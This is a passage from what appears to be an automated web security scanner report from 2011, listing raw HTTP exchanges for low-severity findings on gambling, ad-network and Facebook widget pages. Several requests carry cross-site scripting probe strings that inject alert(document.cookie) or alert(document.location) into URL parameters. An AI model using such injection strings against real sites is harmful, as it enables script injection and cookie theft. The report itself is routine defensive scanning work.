class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.105.47
X-Cnection: close
Date: Mon, 16 May 2011 12:50:28 GMT
Content-Length: 9705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd11d94ebca80a32108980" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">88,134</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

16.5. http://www.primescratchcards.com/index.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.primescratchcards.com
Path:	/index.asp

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OCCAMGNDCGHEBKEEJCJBDFCH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Cards - £5 Free to Scratch & Win £1,000,000</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="scratch cards, scratchcards, online scratch card, online scratch games, scratchcard, scratchcards, scratch games, scratch tickets, lottery tickets, scratch, card, off, scratch off, ticket, tickets, win, games, scratch game, on line scratch, scratch off tickets, scratch off games, scratch off card, online scratch game, bingo, lottery, national lottery, make money">
<meta name="description" content="PrimeScratchCards.com, The leading online scratch cards brand, offers instant wins and prizes of up to £1,000,000 per card. Join today and take the advantage of £5 free to try your luck!">
<link type="text/css" rel="stylesheet" href="http://primescratchcards.com/css/screen.css" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script language="javascript">

function GameHelpPopUp(GameName) {
window.open('HelpGameGeneric.asp?PopUp=1&GameName=' + GameName, '', 'height=590,width=640,left=100,top=50,statusbar=no,toolbar=no,menubar=yes,scrollbars=yes,resizable=no');
...[SNIP]...

Request 2

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:46:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:46:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:46:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=LHCAMGNDEBJMKLIONPMJNCGF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Cards - £5 Free to Scratch & Win £1,000,000</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="scratch cards, scratchcards, online scratch card, online scratch games, scratchcard, scratchcards, scratch games, scratch tickets, lottery tickets, scratch, card, off, scratch off, ticket, tickets, win, games, scratch game, on line scratch, scratch off tickets, scratch off games, scratch off card, online scratch game, bingo, lottery, national lottery, make money">
<meta name="description" content="PrimeScratchCards.com, The leading online scratch cards brand, offers instant wins and prizes of up to £1,000,000 per card. Join today and take the advantage of £5 free to try your luck!">
<link type="text/css" rel="stylesheet" href="http://primescratchcards.com/css/screen.css" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script language="javascript">

function GameHelpPopUp(GameName) {
window.open('HelpGameGeneric.asp?PopUp=1&GameName=' + GameName, '', 'height=590,width=640,left=100,top=50,statusbar=no,toolbar=no,menubar=yes,scrollbars=yes,resizable=no');
}

   function switchLang() {
       var lang_selector = document.langFrm.lang.value;

       if (lang_selector=='?g=3')
       {
           docum
...[SNIP]...

17. Cross-domain POST previous next
There are 2 instances of this issue:

http://leandrovieira.com/projects/jquery/lightbox/
http://www.huddletogether.com/projects/lightbox2/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

17.1. http://leandrovieira.com/projects/jquery/lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leandrovieira.com
Path:	/projects/jquery/lightbox/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:41 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick" />
...[SNIP]...

17.2. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_note
currency_code
tax
bn
submit

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

   <title>Lightbox 2<
...[SNIP]...
</p>

<form name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

18. Cross-domain Referer leakage previous next
There are 49 instances of this issue:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
http://ad.yieldmanager.com/imp
http://d.tradex.openx.com/afr.php
http://home.okscratchcards.com/Promotions.aspx
http://home.okscratchcards.com/visit.aspx
http://itunes.apple.com/us/app/pclottery/id399201446
http://primescratchcards.com/images/index.asp
https://scratch.betsson.com/en/
https://scratch.betsson.com/en/
http://scratch.co.uk/
https://secure.neogames-tech.com/ScratchCards/Lobby.aspx
https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js
https://www.aspireaffiliates.com/
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/marketing-samples/
https://www.aspireaffiliates.com/mobile/
http://www.bigmoneyscratch.com/Home.aspx
http://www.facebook.com/
http://www.facebook.com/WinningsCom
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.incomate.com/
http://www.info.crazyscratch.com/AboutUs.aspx
http://www.info.crazyscratch.com/ContactUsMail.aspx
http://www.info.crazyscratch.com/FairPlay.aspx
http://www.info.crazyscratch.com/Help.aspx
http://www.info.crazyscratch.com/InviteFriend.aspx
http://www.info.crazyscratch.com/PlayersClub.aspx
http://www.info.crazyscratch.com/Privacy.aspx
http://www.info.crazyscratch.com/Promotions.aspx
http://www.info.crazyscratch.com/Responsible.aspx
http://www.info.crazyscratch.com/Terms.aspx
http://www.info.crazyscratch.com/UnderAge.aspx
https://www.interwetten.com/en/default.aspx
http://www.karamba.com/Home.aspx
http://www.lga.org.mt/lga/content.aspx
https://www.neogamespartners.com/
http://www.okscratchcards.com/
http://www.okscratchcards.com/terms-and-conditions.aspx
http://www.primescratchcards.com/index.asp
http://www.scratch2cash.com/Home.aspx
http://www.scratchcardheaven.com/Home.aspx
http://www.trustlogo.com/ttb_searcher/trustlogo
http://www.vincite.net/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=7083343476988375

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CLKC9KDn1fTR9QEQ2AUYWjIIvi89mH3q5uw
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.metacafe.com/fplayer/%253F4702d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ebe96a23f3a3%253D1%26hl%3Den%26client%3Dca-pub-2867713193962996%26adU%3Dshop.nordstrom.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHep4_U_zJEwg0rvba2TitU8m1R0A

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=7083343476988375 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:49:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4978

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLKC9KDn1fTR9QEQ2AUYWjIIvi89mH3q5uw">
...[SNIP]...
6client%3Dca-pub-2867713193962996%26adurl%3Dhttp://shop.nordstrom.com/c/new-stores-rack%253Fcm_ven%253Drack%2526cm_cat%253Dannapolis_nso%2526cm_pla%253Dgoogle%2526cm_ite%253D728x90_shopping_spree_ver"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLKC9KDn1fTR9QEQ2AUYWjIIvi89mH3q5uw" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBFIaoaB3RTd-bOuf_lQfhneSwCrP5qpUCg4363ymTkPSsQwAQARgBIJTzyhY4AFDnsOGXA2DJhoWJiKSEELIBEHd3dy5tZXRhY2FmZS5jb226AQk3Mjh4OTBfYXPIAQTaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MeABBJgCtAu4AhjAAgHIAuuylx_gAgDqAgo5OTE1Mzc3NTM2kAPgA5gD4AOoAwH1AwAAAITgBAE%26num%3D1%26sig%3DAGiWqtzcEA3XmqpHJIpR2dQqEMm42lJIEg%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp://shop.nordstrom.com/c/new-stores-rack%253Fcm_ven%253Drack%2526cm_cat%253Dannapolis_nso%2526cm_pla%253Dgoogle%2526cm_ite%253D728x90_shopping_spree_ver" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.metacafe.com/fplayer/%253F4702d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ebe96a23f3a3%253D1%26hl%3Den%26client%3Dca-pub-2867713193962996%26adU%3Dshop.nordstrom.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHep4_U_zJEwg0rvba2TitU8m1R0A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.2. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

The response contains the following links to other domains:

http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
http://d.tradex.openx.com/avw.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE&n=a7feacb4
http://d.tradex.openx.com/ck.php?n=a7feacb4&cb=INSERT_RANDOM_NUMBER_HERE

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

18.3. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379

The response contains the following links to other domains:

http://pixel.invitemedia.com/data_sync?partner_id=41&exchange_id=4
http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false
http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D
http://view.atdmt.com/COM/view/285952721/direct;wi.300;hi.250/01/

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:52:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4368

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250"><script language="JavaScript" type="text/javascript">
...[SNIP]...
gDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%26redirectURL%3Dhttp://clk.atdmt.com/COM/go/285952721/direct;wi.300;hi.250/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/285952721/direct;wi.300;hi.250/01/" /></a></noscript></iframe>
